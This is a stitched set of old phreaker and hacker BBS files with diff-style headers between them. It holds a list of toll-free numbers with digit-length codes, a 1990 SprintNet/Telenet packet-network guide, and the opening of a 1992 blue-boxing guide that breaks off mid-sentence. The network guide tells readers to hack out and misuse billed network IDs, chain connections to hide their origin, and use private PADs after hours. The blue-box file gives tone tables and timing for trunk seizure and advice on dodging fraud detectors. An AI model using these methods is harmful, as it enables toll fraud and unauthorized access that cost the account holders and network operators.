1-800-221-5665 1-800-682-4000 6 digits
1-800-221-5670 1-800-654-8494 6 digits
1-800-221-8190 4 digits 1-800-641-4713 3WAY 8-1-AC
1-800-223-7854 1-800-638-6402
1-800-243-7650 6 digits 1-800-637-4663
1-800-255-2255 1-800-621-1703
1-800-321-0327 4 digits 1-800-621-1506
1-800-321-0424 1-800-547-6754 6 digits
1-800-321-0845 6 digits 1-800-547-6017
1-800-323-4313 1-800-547-1784
1-800-327-0005 1-800-543-7168 8 digits
1-800-327-0326 4444-9 1-800-527-3511 8 digits
1-800-327-2703 1-800-553-8432
1-800-327-6713 4 digits 1-800-424-9826
1-800-327-9136 4 digits 1-800-521-8400 8 digits
1-800-327-9895 7 digits 1-800-368-4222
1-800-328-1224 088759 1-800-368-5963
1-800-331-4100 1-800-356-0001 1-2-3...2-3-4
1-800-343-1319 1-800-343-1844 4 digits
1-800-348-1800 1-800-245-4890 4 digits
1-800-328-7112 4 digits 1-800-227-3414 4 digits
1-800-462-6471 5 digits 1-800-322-1415 6 digits
1-800-521-1674 4 digits 1-800-327-2731 6 digits
1-800-252-5879 8 digits 1-800-345-0008 7 digits
1-800-245-7508 5 digits 1-800-526-5305 8 digits
1-800-323-3027 6 digits 1-800-242-1122
1-800-621-4611 1-800-325-3075
1-800-336-6000 1-800-221-1950
1-800-323-8126 1-800-325-7222
[Mother Earth BBS]
+798
View File
@@ -0,0 +1,798 @@
% X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X %
X**=======================================================================**X
%!! Phreakers/Hackers/Anarchists !!%
X!! -++--++--++--++--++--++--++- !!X
%!! !!%
X!! THE COMPLETE INTRODUCTORY GUIDE TO SPRINTNET AND !!X
%!! SIMILAR PACKET SWITCHED NETWORKS !!%
X**=======================================================================**X
% X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X %
X**=======================================================================**X
%!! P/H/A - Written By Doctor Dissector On Sunday, April 22, 1990 - P/H/A !!%
X**=======================================================================**X
% X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X %
Part I: Disclaimer
------------------
The sole purpose of this document is to educate. Neither the author nor
the sponsor group (Phreakers/Hackers/Anarchists) will be held responsible
for the reader's actions before, during, and following exposure to this
document as well as the validity or accuracy of the information contained
within this document.
Part II: Introduction
---------------------
Packet switching networks can be said to be the most useful tool for both
the inexperienced and the experienced hack. When I first learned about
PSNs (SprintNet/Telenet in general), I discovered that there were not any
good "full length" introductions or guides to the use of these systems. In
effect, scrounging around for a small file here and another there was not
very productive in any sense. So, I decided to compile a "complete"
introduction and guide, as I know it, to the "world" of the packet switched
network. Enjoy!
Doctor Dissector - PHA
Part III: Table Of Contents
---------------------------
Part Description
----- -------------------------------------------------------------
I Disclaimer
II Introduction
III Table Of Contents
IV What Is A Packet Switched Network?
V Network Protocols
VI PAD Security
VII Connection To The SprintNet PAD
VIII X.121 International Address Format
IX Network User Identification
X Setting PAD ITI/X.3 Parameters
XI Disconnect Code Sequence
XII Misc Network Notes
XIII Appendix
XIV Conclusion And Closing Notes
XV Greets, Hellos, Etc....
Appendix Description
-------- -----------------------------------------------------------
A Hunt/Confirm Sequence Codes
B PAD Command Summary
C ITI/X.3 Parameter Summaries
D International DNIC/PSN List
E Overseas PSNs Which Accept Collect Calls
F Network Protocol List
G Glossary
Part IV: What Is A Packet Switched Network?
-------------------------------------------
A packet switched network can be accessed through any local POTS
dialup/port. Systems known as "hosts" on the PSN pay for connection to
the PSN depending on transmission speed and protocol type. PSNs offer
more efficient data transfer and less rates as compared to the typical
circuit switched call. Thus, to anyone who would be interested in
transferring large amounts of data over either the PSN or the circuit
system, the PSN would result in an increase of convenience due to the
reduction of data transmission error and cost.
Another feature of the PSN is the speed and data translation which
takes place between the PSN's PAD (Packet Assembler/Disassembler) and
the host. For example, one could connect to the PSN's PAD at 1200 bps
and the PAD could connect to the host system at 9600 bps and still
allow the user to receive error free transmission. This "flow control"
is done by the actual increase or decrease of the data packet between
the PAD and the user or the PAD and the host.
PSNs also have the ability to interconnect through special gateways
which might allow one user who dialed one PSN's PAD and then connected
to another PSN's PAD through a system which was accessible by the first.
Almost every PSN in the world can be accessed through gateways on one
PSN to another PSN, through subsequent gateways until the target PSN
is achived; of course, there are always exceptions, some private or
small data networks may not be reachable through gateways, these systems
can only be reached, usually, through direct dialins.
Some PSNs allow the caller to execute "collect calls" to host
systems which accept them, although the majority of the hosts on any
given PSN do not accept collect calls. To connect to a host system which
does not accept collect calls, one must possess a network user identifier
(NUI) or access to a private system on the PSN which accepts collect
calls and has the ability to access another PSN with its own identifier.
These will be discussed further into this document.
Part V: Network Protocols
-------------------------
The PSN utilizes several communications protocols similar to the
communications protocols used by typical asynchronous modems. However,
MOST PSNs utilize synchronous communications and the X type protocols
versus the typical modem's asynchronous V protocols. As a result, the
PAD of any PSN also serves as a synchronous/asynchronous translator
between the synchronous netowrk and the asynchronous modem.
Most PSNs offer network speeds from snail's pace baud rates of
300 bps (asynchronous) to the lightning of 48,000 bps (synchronous).
The most common data protocol used by PSNs today is the X.25 protocol,
thus if one were able to access a private PAD which offered support for
the X.25 protocol, one could access virtually any network user address
(NUA) from that PAD. SprintNet PADs support the X.25 protocol, so if
one had an NUI of sorts, one also could access any NUA from the SprintNet
PAD. See appendix F for a list of network protocols.
Part VI: PAD Security
---------------------
SprintNet PADs and most dialin PADs in general have no "immediate"
form of telephone security common within their systems. Plainly, SprintNet
and most PSN dialin PADs cannot trace on the fly, as they do not have
their own equiptment to trace incomming calls. HOWEVER, this does not
mean that they CANNOT trace; SprintNet can, and will, upon probable
cause, cooperate with the telco to trace calls. Notice that tracing
usually is premeditated and one-time abusers have a very slim chance
of being caught. Also note that most PAD activities are logged and if
abuse is suspected, the PSN owners would most likely suspect the abuser
as originating from the local area, since the POTS dialin/port is also
located in the same area.
Once online, security from "calling" hosts which do not accept collect
calls is enforced by the presence of the NUI. Without an NUI, one would
usually be stuck, only able to call systems accepting collect calls, sans
the use of another system's NUI.
There is one more aspect of seucurity worth mentioning. Whenever a
packet of data is sent to a host system, a header of data is sent stating
where the originating "call" is being placed by. Thus, if you were
connecting to "312312" from your local POTS dialin/port that owned an
address of "20231H," the system at 312312 would know the call was being
originated from 20231H. Once again, if someone were abusing any system on
the PSN and that system saved a log of the originating addresses accessing
that system, the owners of the abused system could easily determine which
POTS dialin/port number the abuser was using, and then inform the PSN
security of possible abuse in that dialin's local area. Because of this
ability to "trace" the originating address, there is one way to foil this.
One could connect to another PAD, and then, from that PAD connect to
the target system. Thus, the POTS dialin/port address will be sent to
the connected PAD, and the connected PAD would intercept the POTS address
and send the connected PAD's address to the target system instead of
the POTS address. SO, if the target system was abused and the owners
attempted to "trace" the originating address, they would receive the
address of the connected PAD. For example: you dial your local POTS
dialin/port which had an address of "71516G," log into another PAD at
"415100," connect from 415100 to "213213." The system at 213213 if
"traced" would find that you were originating from 415100, not 71516G.
See how it works? Good... Notice that the system 213213 would still
know that you were originating from 71516G, but the folks you were
genuinely abusing wouldn't know that!
Part VII: Connection To The SprintNet PAD
-----------------------------------------
The following procedure outlines the methods used to connect to
and through the SprintNet PAD.
Step Procedures Network/Operator Response
---- ---------- -------------------------
1 Turn on your terminal. Make sure
it's Online.
2 Dial your local SprintNet access
number.
3 For data sets Bell 103 & 113 type,
depress the DATA button.
4 Enter the hunt/confirm sequence <CR> <CR>
for your baud/parity type. For
E,7,1 1200/2400, type <CR> twice.
For hunt/confirm sequences, see
appendix A.
5 SprintNet will identify itself, TELENET
its port address, and then send 909 14B
a TERMINAL= prompt for terminal
identification. "D1" specifies TERMINAL=D1<CR>
dumb terminal.
6 NUI Input: After SprintNet gives
the "@" prompt, type "ID ;" and @ID ;ABCD<CR>
then your ID code, follwed by a PASSWORD=123456<CR>
<CR>. Then enter your password
followed by another <CR>. If you
don't have an NUI, you can always
access systems which allow collect
calls.
7 At the "@" prompt, you can enter @02341123456790<CR>
the network user address (NUA) of
the desired host. If, during the
connection attempt wish to abort
the attempt, a BREAK signal will
bring you back to the "@" prompt.
8 SprintNet will respond with a (address) CONNECTED
connection message, or an error
message.
9 To disconnect from your computer, (address) DISCONNECTED
log off as usual. SprintNet will
send a disconnect message. To
disconnect off of a system without
logging off, typing "<CR>@<CR>" will
bring you back to the "@" prompt.
Part VIII: X.121 International Address Format
---------------------------------------------
Most PSNs around the world follow the X.121 format for access to both
domestic and international hosts. SprintNet does not require some parts
of the format for domestic connection, which will be discussed below.
+----------------------------------------- Zero Handler For SprintNet
| (Formats The X.121 Address)
|
|
|
| +--------------------------------- Data Network Identifier
| | Code (DNIC)
| |
| |
| | +------------------------- Area Code of Host
| | |
| | |
| | | +--------------- DTE Address of Host
| | | |
| | | |
| | | | +-------- Port Address
| | | | |
| | | | |
|0| |DDDD| |AAA| |HHHHH| |PP|
|
+------- Optional 'Subaddress'
Field for Packet Mode
DTE
For a complete list of DNICs/PSNs according to country, please see
appendix D.
On SprintNet, a "0" MUST lead the NUA, although on other PSNs, this
may not be necessary.
On SprintNet, the DNIC is defaulted to 3110. Any host entered at the
"@" prompt, if domestic to Telenet/USA, will not require the input of
zero handler or the 3110 DNIC. For example:
Domestic X.121 SprintNet Int'l
---------- -------------- ---------------
2129966622 31102129966622 031102129966622
212869 311021200869 0311021200869
21244 311021200044 0311021200044
Part IX: Network User Identification
------------------------------------
Network user identifiers (NUIs) offer full SprintNet PAD use for
any distance or amount of time for any host accessible by the PAD in
question. Think of the NUI as a /<-/<00l Kode for calling long
distance. Any systems that you call are logged, and each call is charged.
At the end of the month, the owner of the NUI is billed. So, it is
possible to hack out NUIs and use them, but like k0dez, abuse kills.
NUIs can be entered into SprintNet in two ways. The first method is to
type "ID ;xxxx" where xxxx can be from 4-? charachters in length, both
alphabetic and numeric. Then, at the password prompt, enter a password.
The second method for entering an NUI is in conjunction to the NUA
you are accessing. The format is "<NUA>,<ID>,<PW>" where at the "@"
prompt you would type the desired NUA, followed by a comma, then your
ID followed by a comma, and then your password. Your password will not
be echoed.
Part X: Setting PAD ITI/X.3 Parameters
--------------------------------------
Online PAD parameter modification may be desired for certain
applications, connections, or data transfers. See appendix C for brief
summaries of these parameters. Modification of these parameters can be
done by the following procedure at the "@" prompt:
X.3 Parameters
--------------
To display current parameters: "PAR?<CR>"
The PAD will respond with: "PAR1:<VALUE>,2:<VALUE>,..."
To modify parameter(s): "SET? <PARM>:<VALUE>,<PARM>:<VALUE>,..."
The PAD will respond with: "PAR<PARM>:<VALUE>,..."
ITI Parameters
--------------
To display current parameters: "PAR? 0,<PARM>,<PARM>,..."
The PAD will respond with: "PAR<PARM>:<VALUE>,<PARM>:<VALUE>,..."
To modify parameter(s): "SET? 0:33,<PARM>:<VALUE>,<PARM>:<VALUE>,..."
The PAD will respond with: "PAR0:33,<PARM>:<VALUE>,..."
Part XI: Disconnect Code Sequence
---------------------------------
When disconnected off of any host on SprintNet, a disconnect coding
sequence with a string of data will be sent to your terminal. The
following is a translation format for the disconnect coding.
<NUA> DISCONNECTED AA BB TT:TT:TT:TT CCC DD
Where:
<NUA> is the NUA of the given host system.
AA is the clearing code.
BB is the diagnositc code.
TT:TT:TT:TT is the time spent on the host.
CCC is the number of frames received.
DD is the number of frames sent.
Part XII: Misc Network Notes
----------------------------
Just a few things one might want to know when using PSNs:
1) When using/abusing a private PAD, try to use it after business
hours, as the operators will not tend to discover your presence
as quickly.
2) When hacking or abusing ANY system on ANY PSN, if anything seems
different or suspicious, logoff, disconnect, or HANG-UP
IMMEDIATELY! Much better SAFE than SORRY!
3) For a complete and updated list of POTS dialin/ports, dial the
IN-WATS number at 1-800-546-1000 or 1-800-546-2000, type "MAIL,"
and for user name and password, enter "PHONES." You will be
diverted to the SprintNet dialing directory & a menu. From then on
you will have plenty of info about POTS dialins and port numbers.
4) For international information concerning SprintNet and other PSNs,
get to a SprintNet "@" prompt and type "MAIL." Then, for the user
name, enter "INTL/ASSOCIATES." For the password, type "INTL," and
you will be diverted to the international information menu.
5) For even more info on SprintNet and PCP, the NUA for the PCP
support BBS is 311090900631 (909631 domestic).
6) Some 2400 bps and 2400+ bps PADs have problems recognizing 8,N,1
connections. Sometimes they only allow E,7,1 transmissions.
Experimentation or inquiry may yeild results. SprintNet's customer
information line is at 1-800-336-0437, overseas is 1-703-689-6400.
7) PCP outdials and other outdial systems are abundant on the PSNs
throughout the world. If you have any NUAs to these or find any,
they utilize the typical Hayes AT command set, so they should be
easy to figure out. MOST of the time, they ONLY allow dialing of
local (to the oudial's area code) numbers, but some have been known
to allow interstate and even international calls. Experimentation,
again, is always necessary.
8) Domestically, the "AAA" (Area Code) portion of the NUA is usually
the same as the area code (NPA) of the same calling area. However,
some area codes are shared on the network and some non-existant
area codes such as 909, 223, 224 and others contain hosts.
9) On any PAD, the data transmission rates may be slowed, due to the
assembley/disassembley time, called packet delay. Depending on which
system, baud, and transfer protocol used, pad delay can differ from
almost none to noticable fractions of seconds. PCP oudials are
notorious for LLOONNGG pad delays....
Part XIII: Appendix
-------------------
Appendix A: Hunt/Confirm Sequence Codes
=======================================
Bits Stop Parity Modem Baud Duplex Sequence
---- ---- ------ ---------- ------ --------
7 1 EVEN 300-1200 FULL <CR><CR>
7 1 EVEN 300-1200 HALF <CR>;<CR>
7 1 EVEN 2400 FULL @<CR>
7 1 EVEN 2400 HALF @;<CR>
8 1 NONE 300-1200 FULL <CR>D<CR>
8 1 NONE 300-1200 HALF <CR>H<CR>
8 1 NONE 2400 FULL @D<CR>
8 1 NONE 2400 HALF @H<CR>
At BPS speeds 2400+, wait 1/2 a second BEFORE and AFTER the
"@" sign in the sequence above.
Appendix B: PAD Command Summary
===============================
The following is a list of commands usable from the "@" prompt on the
SprintNet PSN.
Command Description
----------- -------------------------------------------------------------
<NUA> Connects to the host specified by that NUA.
C <NUA> Connects to the host specified by that NUA.
STAT Displays the network port address (NUA of the port).
FULL Sets duplex to full.
HALF Sets duplex to half.
DTAPE Prepares the PSN for bulk file transfers.
CONT Continues the current connected session/connect attempt.
BYE Aborts connect attempt/disconnects from current session.
D Aborts connect attempt/disconnects from current session.
HANGUP Logs you off from the SprintNet PAD.
TERM <TERM> Changes the terminal specification to that of <TERM>.
MAIL Request connection to SprintNet Telemail.
TELEMAIL Request connection to SprintNet Telemail.
ID ;<ID> Enter NUI, <ID> is your ID. This is followed by a PASSWORD
prompt. Password will not be echoed.
TEST CHAR Test if you are receiving garbled output. If so, adjust
parity or data bits, and then try again. If errors persist,
be sure to complain to SprintNet customer service!
TEST ECHO Test if your input is being garbled by Telenet. Similar
otherwise as TEST CHAR.
Appendix C: ITI/X.3 Parameter Summaries
=======================================
Para- Para-
meter Description (Default Value) meter Description (Default Value)
----- --------------------------- ----- ---------------------------
1 Line feed Insertion (0) 31+ Interrupt Character (0)
2 Network Message Display (0) 32 Automatic Hang-up (0)
3 Echo (1) 33+ Flush Output (0)
4 Echo Mask (163) 34 Transmit on Timers (1)
5 Transmit Mask (2) 35 Idle Timer (80)
6* Buffer Size (0) 36 Interval Timer (0)
7* Command Mask (127) 37 Network Usage Display (0)
8* Command Mask (3) 38 Carriage Return PAD (Variable)
9 Carriage Return PAD (Fixed) 39 Padding Options (1)
10 Linefeed Padding 40 Insert on Break (0)
11 Tab Padding 41 PAD-Terminal Flow Control (0)
12 Line Width 42 PAD-Terminal XON Character (17)
13 Page Length (0) 43 PAD-Terminal XOFF Character (19)
14 Line Folding (1) 44* Generate Break (INV)
15 Page Wait (0) 45* APP on Break (0)
16 Interrupt on Break (0) 46 Input Unlock Option (0)
17 Break Code (0) 47 Input Unlock Timer (0)
18 NVT Options (0) 48 Input Unlock Character (0)
19 Initial Keyboard State (0) 49 Output Lock Option (2)
20 Half/Full Duplex 50 Output Lock Timer (10)
21 Real Character Code 51 Output Lock Option (0)
22 Printer Style 53* Break Options (0)
23 Terminal Type 54 Terminal-PAD Flow Control (0)
24 Permanent Terminal (0) 55 Terminal-PAD XON Character (17)
25 Manual or Auto Connect (0) 56 Terminal-PAD XOFF Character (19)
26 Rate 57 Connection Mode (2)
27 Delete Character (127) 58 Escape to Command Mode (1)
28 Cancel Character (24) 59* Flush Output on Break (0)
29 Display Character (18) 60 Delayed Echo
30+ Abort Output Character (0) 63 Eight-bit Transparency (1)
64+ Early ACK (0)
65 More-Data Bit Generation (3)
66 Defer Processing of User (0)
67 ESP Packetizing Option (0)
68 Escape Sequence Timer (0)
69 Escape Sequence Maximum Length (0)
70 Escape Sequence Initiator (0)
71 Parameter Reset on Disconnect (0)
Note: - All Telenet Parameters must follow the National Option Marker
(Parameter 0, value '21' Hex) in PAD Messages.
- Parameters marked with "*" should not be used.
- Parameters marked with "+" should be used with caution.
Appendix D: International DNIC/PSN List
=======================================
Note: This is not a complete list!
COUNTRY NETWORK DNIC
------- ------- ----
ALASKA ALASCOM 3135
ANTIGUA ANTIGUA 3443
ARGENTINA ARPAC 7220
ARGENTINA ARPAC 7222
AUSTRIA DATEX-P 2322
AUSTRIA RA 2329
AUSTRALIA AUSPAC 5052
AUSTRALIA MIDAS 5053
BAHAMAS BATELCO 3640
BAHRAIN IDAS 4263
BARBADOS IDAS 3423
BELGIUM DCS 2062
BELGIUM DCS-TELEX 2068
BELGIUM DCS-PSTN 2069
BERMUDA IPSD 3503
BRAZIL INTERDATA 7240
BRAZIL RENPAC 7241
BRAZIL RENPAC 7249
BRAZIL RENPAC 7248
CAMEROON CAMPAC 6242
CANADA DATAPAC 3020
CANADA GLOBEDAT 3025
CANADA CNCP 3028
CANADA TYMNET CANADA 3106
CAYMAN ISLANDS IDAS 3463
CHILE ENTEL 7302
CHILE ENTEL 3104
CHINA PTELCOM 4600
COLUMBIA DAPAQ 3107
COSTA RICA RACSADATOS 7120
COSTA RICA RACSAPAC 7122
COSTA RICA RACSAPAC 7128
COSTA RICA RACSAPAC 7129
COTE D'IVOIRE SYTRANPAC 6122
DENMARK DATAPAK 2382
DEMMARK DATAPAK 2383
DOMINICAN REPUBLIC UDTS 3700
EGYPT ARENTO 6020
FINLAND FINNPAK 2442
FRANCE TRANSPAC 2080
FRANCE N.T.I. 2081
FRANCE TRANSPAC 9330
FRANCE TRANSPAC 9331
FRANCE TRANSPAC 9332
FRANCE TRANSPAC 9333
FRANCE TRANSPAC 9334
FRANCE TRANSPAC 9335
FRANCE TRANSPAC 9336
FRANCE TRANSPAC 9337
FRANCE TRANSPAC 9338
FRANCE TRANSPAC 9339
FRENCH ANTILLES DOMPAC 3400
FRENCH GUYANA DOMPAC 7420
GABON GABONPAC 6282
GERMANY DATEX-P 2624
GREECE HELPAK 2022
GREENLAND DATAPAK 2901
GUAM LSDS-RCA 5350
GUATEMALA GUATEL 7040
HONDURAS HONDUTEL 7080
HONG KONG IDAS 4542
HONG KONG DATAPAK 4545
HUNGARY DATEXL 2160
HUNGARY DATEXL 2161
ICELAND ICEPAC 2740
INDONESIA SKDP 5101
IRELAND IPSS (EIRE) 2721
IRELAND EIREPAC 2724
ISRAEL ISRANET 4251
ITALY DARDO 2222
ITALY ITAPAC 2227
IVORY COAST SYTRANPAC 6122
JAMAICA JAMINTEL 3380
JAPAN DDX-P 4401
JAPAN VENUS-P 4408
JAPAN NISNET 4406
JAPAN NI+CI 4410
KUWAIT 4263
LEBANON SODETEL 4155
LUXEMBOURG LUXPAC 2704
LUXEMBOURG PSTN 2709
MALAYSIA MAYPAC 5021
MAURITIUS MAURIDATA 6170
MEXICO TELEPAC 3340
NETHERLANDS DATANET-1 2040
NETHERLANDS DATANET-1 2041
NETHERLANDS DABAS 2044
NETHERLANDS DATANET 2049
NETHERLANDS/ANTILLES UDTS ITT 3620
NETHERLANDS/MARIANAS PCINET 5351
NEW CALEDONIA TOMPAC NC 5460
NEW ZEALAND PACNET 5301
NORWAY DATAPAK 2422
PANAMA INTELPAQ 7141
PANAMA INTELPAQ 7142
PHILIPPINES CAPWIRE 5151
PHILIPPINES PHILCOM RCA 5152
PHILIPPINES GMCR 5154
PHILIPPINES ETPI-2 5156
POLYNESIA TOMPAC 5470
PORTUGAL TELEPAC 2680
PORTUGAL SABD 2682
PUERTO RICO UDTS- PDIA 3301
PUERTO RICO UDTS- I 3300
QATAR DOHPAC 4271
REUNION ISLAND DOMPAC 6470
SAN MARINO X-NET 2922
SAUDI ARABIA BAHNET 4263
SINGAPORE TELEPAC 5252
SINGAPORE TELEPAC 5258
SOUTH AFRICA SAPONET 6550
SOUTH AFRICA SAPONET 6559
SOUTH KOREA DACOM-NET 4501
SOUTH KOREA DNS 4503
SPAIN TIDA 2141
SPAIN IBERPAK 2145
SWEDEN TELEPAK 2405
SWEDEN DATAPAK 2402
SWITZERLAND TELEPAC 2284
SWITZERLAND DATALINK 2289
TAHITI TOMPAC 5470
TAIWAN UDAS 4877
TAIWAN PACNET 4872
THAILAND IDAR 5200
TORTOLA 3483
TRINIDAD TEXTET 3740
TRINIDAD DATANETT 3745
TUNISIA RED25 6050
TURKEY TURPAC 2862
TURKS BWI 3763
UNITED ARAB EMIRATES EMDAN 4241
UNITED ARAB EMIRATES TELEX 4243
UNITED ARAB EMIRATES TEDAS 4310
UNITED KINGDOM IPSS 2341
UNITED KINGDOM PSS 2342
UNITED KINGDOM MPDS MERCURY 2350
UNITED KINGDOM PSS MERCURY 2352
U.S.S.R. IASNET 2502
UNITED STATES OF AMERICA TELENET 3110
UNITED STATES OF AMERICA TYMNET 3106
U.S. VIRGIN ISLANDS UDTS-PDIA 3300
URUGUAY 7482
ZIMBABWE ZIMNET 6482
Appendix E: Overseas PSNs Which Accept Collect Calls
====================================================
COUNTRY NETWORK
------- -------
ALASKA ALASCOM
CANADA DATAPAC
CHILE ECOM
COSTA RICA RACSA
DOMINICAN REPUBLIC CODETEL
HAWAII TELENET
ISRAEL ISRANET
MEXICO TELEPAC-SCT
PANAMA INTEL
PHILIPPINES ETPI
PUERTO RICO PRTC
Appendix F: Network Protocol List
=================================
Protocol Speed/bps Type
-------- --------- ------------
V.21 300 Asynchronous
V.22 1200 Asynchronous
V.23 1200/75 Asynchronous
V.xx 2400 Asynchronous
X.25 300-48000 Synchronous
X.28 300-19200 Asynchronous
X.29 300-19200 Synchronous
X.3 300-19200 Synchronous
X.32 24000 Synchronous
X.75 300-19200 Synchronous
Telex 50 Asynchronous
Appendix G: Glossary
====================
The following is a list of acronyms and terms which are often refered
to in this document and others dealing with this subject.
ACP - Adapter/Concentrator of Packets.
Area Code - The first three digits following the DNIC of any given NUA.
For example, the NUA 311031200324 has an area code of 312. Domestically,
the area code of the NUA may or may not correspond to the same NPA of
the area code, but this is not always the case.
Close User Group - A type of high security NUI in use on several PSNs
throughout the world. CUG users can access optional parameters
and NUAs blocked out by security.
CUG - Close User Group.
Data Country Code - The first three digits in the four digits of any
given DNIC.
Data Network Identifier Code - The four digits which come before the
area code/address/port address of any given NUA. The DNIC shows
which PSN any given host is based upon. The DNIC can also be broken
down into two parts, the DCC and the NC. For more information, see
part VIII.
DCC - Data Country Code.
Destination Paid Call - A collect call to a NUA which accepts collect charges.
DNIC - Data Network Identifier Code.
DTE - Data Terminal Equipment.
DTE Address - The five digits following the area code of the host on any
given NUA. For example, the NUA 234112345678 has a DTE address of
45678.
Gateway - A host on a given PSN which is connecte both the the originating
PSN and one or more different or same PSNs. Gateways also allow one user
on one PSN the ability to move to another PSN and operate on the second
as if the first was not interfering.
Host - Any system accessible by NUA on the PSN.
Hunt/Confirm Sequence - String of charachters sent to the SprintNet POTS
dialin/port which allows SprintNet to determine the speed and data type
to translate to on its PAD.
ITI Parameters - Online PAD parameters (X.3 or ITI) which allow the user
to modify existing physical measurements of packet length and otherwise.
LAN - Local Area Network.
Local Area Network - A data network which operates within the confines
of an office building or other physical structure where several
computers are linked together into a network in order to share data,
hardware, resources, etc. These may or may not own a host address on
any data network, and if so, may be accessed via NUA; otherwise
direct dialin is the only alternative.
NC - Network Code.
NCP - Nodes of Communication of Packets.
Network Code - The fourth digit of any given PSN's DNIC.
Network Protcol - The hardware protocol which allows the host systems to
communicate efficiently with the PSN it is connected to. Generally,
synchronous protcols (X.??) are used within the network and
asynchronous protcols (V.??) are used to access the network, but
asynchronous protcools within the network and/or synchronous dialin
points are not unheard of. The standard protocol for packet transfer
today is the X.25 synchronous data protcol. For detailed information,
please see part V and appendix F.
Network User Address - The address of any given host system on any
PSN. This address is thought of as a "phone number" which is dialed
to access the desired host. For detailed information on the X.121
format for the NUA, see part VIII.
Network User Identifier - The ID and password which allow the user
which has logged onto the PSN's PAD to originate calls to host systems
which do not accept collect calls. it is often thought of as a "k0de"
or a calling card which will be billed for at the end of every month.
NUA - Network User Address.
NUI - Network User Identifier.
Outdial - Any system which allows local, national, or international
dialing from the host system. PC-Pursuit can be defined as a local
outdial system. Most outdials operate using the Hayes AT command set
and others may be menu oriented.
Packet Assembler/Disassembler - The device/host which translates the
actual input/output between the host and the user. The PAD often
translates between baud rates, parities, data bits, stop bits,
hardware protocols, and other hardware dependant data which reduces
the hassle of continual modification of terminal and hardware
parameters local to the originating terminal.
Packet Switched Network - A network based upon the principle of packet
switching, which is the input/output of packets to and from the PAD
which translates input and output between the user and the host.
For detailed information, please see part IV.
Packet Switched System - Another name for the PSN.
Packet SwitchStream - The PSN used by British Telecom.
PAD Delay - The extra time that is used to translate incomming and
outgoing packets of data which is composed of a continous stream of
clear-to-send and ready-to-send signals. PAD delay can vary depending
on the type of network protocol and network/port speed is being
used.
PAD - Packet Assembler/Disassembler (technical), Public Access Device
(customer service description).
PDN - Public Data Network or Private Data Network.
Port Address - The two optional digits at the end of any given NUA which
allow the PAD/PSN to access a given port. For example, 031102129922255
would reach the nua 311021299222.55, .55 being the port address.
Private Data Network - Any network (LAN/WAN/PSN) which is owned and
operated by a private company. Private networks are usually smaller
than public networks and may host a myriad of features such as
gateways to other public/private networks, servers, or outdials.
PSN - Packet Switched Network.
PSS - Packet SwitchStream or Packet Switched System.
Public Data Network - Another name for the PSN.
Server - A type of network which is connected to a host system which can
be reached either via NUA or direct dial which provides the "brain"
for a LAN or WAN.
SprintNet - The new name for Telenet. A PSN which is based in the United
States and allows destination paid calls to originate from an un-
identified customer. The DNIC for SprintNet is 3110.
Telenet - The old name for SprintNet. This name change occured in 1990.
V.?? - Asynchronous network protocol.
WAN - Wide Area Network.
Wide Area Network - A data network which operates on a continuous link
basis as opposed to the packet switched basis. These do not operate
on the X.25 protocol and may only be accessed via direct-dial or
a host on a PSN which is linked with the WAN.
X.?? - Generally symbolizes some type of synchronous network protocol.
X.121 - International Host Address Format for PSNs. See Part VIII for
detailed information.
X.25 - By far the most widely used and standardized network/data protcol
used within the PSN system to connect hosts to the PSN.
Zero Handler - The preceding zero before any given international NUA
when "dialed" from within SprintNet. For example, the NUA 262412345678
would be typed as "0262412345678" from the SprintNet PAD. Most PAD
systems around the world do not require this handler.
Part XIV: Conclusion And Closing Comments
-----------------------------------------
Well, enough typing at last. I hope you enjoyed the file, since it
appears to cover most areas of the PSN domain sans private networks
to a full extent. Hopefully, this file has opened or helped you understand
the packet switched networks in today's telecommunication world and
will aid you in your quest for knowledge etc etc....
Doctor Dissector - PHA
% X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X %
X**=======================================================================**X
%!! (c)Copyright 1990, By Doctor Dissector & Phreakers/Hackers/Anarchists !!%
X**=======================================================================**X
% X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X % X %
Downloaded From P-80 Systems 304-744-2253
+299
View File
@@ -0,0 +1,299 @@
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
& &
& SIGNALLING SYSTEMS & THE BLUE BOX REVAMPED &
& &
& By &
& &
& Lazlo 20/07/92 &
& &
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
NOTE: This file is for informational purposes only and in no way is
any toll-fraud suggested by the author.
INTRODUCTION
============
I will in this file discuss some of the international trunk-signalling systems
used and methods to box over them. The main reason for writing this article
is the downfall of US boxing due to:
* 2400 & 2600 detectors on trunks
* CCIS
* Snooping on subscribers who place several (lengthy) calls to 800 numbers
Detection could simply by avoided by boxing off another country (on a tollfree
line of course) and then calling globally using a signalling system other than
the ones used in the states.
I have also included an in-depth review of the R2.
USAGE
=====
The signalling systems used widely today are: CCIS, CCITT 4, R1, R2 and SOCOTEL.
CCITT 4 can be found mainly in African and South American countries and is very
seldom worth boxing off due to the long routing needed and the poor quality
acheived. R1 and R2 is still very popular in Europe and the US and is really
worth boxing with, especially R2, which offers a multitude of options yet
uncovered for the enthusiastic phreak. The only system listed here that I
haven't boxed off myself is SOCOTEL, which, according to my knowledge is used
somewhere in Europe (who knows where).
.Using R1 to box off Europe (or any other country) from the US is not
recommended. US trunks are maybe not used to route the call, but the fraud
detectors do not know this and sooner or later you *will* be in trouble.
Using systems like R2 from the US is a good idea, since no detector in the
US is looking for R2 tones, and boxing off 800 numbers that offer Country
Direct services should not seem suspicous.
The CCITT R1 system
===================
-----------------------------------------------------
Freq. 700 900 1100 1300 1500 1700 [Hz]
-----------------------------------------------------
Digit
1 x x
2 x x
3 x x
4 x x
5 x x
6 x x
7 x x
8 x x
9 x x
0 x x
11 x x
12 x x
KP x x
KP2 x x
ST x x
-----------------------------------------------------
50/50ms timing can be used with all digits, even 20/20 is possible on some
systems if you want fast dialing.
One problem with R1 is trunk seizure. The normal procedure would be sending
2400/2600, waiting a while, then blowing 2400, and the trunk would be seized.
This is very unlikely to work, though. Even more so is sending 2400 or
2600 directly. The telco equipment is nowadays very exact with timing and
the only way to find it out is by testing. Usually the 2400/2600 (hangup tone)
should be sent for at least 80ms and no more than 200ms, if 200 ms is not
